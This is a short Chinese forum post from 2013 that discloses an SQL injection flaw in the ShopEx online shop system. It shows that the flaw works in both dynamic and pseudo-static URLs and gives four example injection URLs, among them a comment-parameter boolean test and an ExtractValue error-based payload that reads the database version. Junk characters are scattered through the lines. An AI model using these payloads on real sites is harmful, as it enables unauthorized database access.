注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…+ P/ f1 H0 ?! {1 a* U9 v
8 n: r. {) m( g9 d' E+ L, F) q好吧,我扯远了~~' i: V( j# V: J7 u; I* r
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~. e3 r; g: r8 U T* J
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
- _- N: |3 x3 {- M! j3 e, F4 i1 b
* c4 J8 a# A5 n9 vhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html& Z' ?/ J7 Z' U% I
j* j9 S0 _& M9 {- nhttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html) c5 y2 T, d1 W9 H: o `; X. E
4 r* v% l' A" u- r8 Z+ L) E
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html6 I4 I! `9 @8 B, t. I; h
3 \& Q. A6 V% x: a6 V4 J! R1 khttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html' x5 K) G/ Z. `
- x: C W* N' @ }; f' r1 h b5 F, ~. ~& b" p) m; E
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
/ m; @7 u7 J" W: F1 o+ N0 |& [如何注入就不多说了,10多年的东西了…不会也会了…# L/ h! U: @4 U! `; Z, |
" p( N$ g- S7 H% J0 ~
|
发表于 2013-2-4 16:20:04
收藏
支持
反对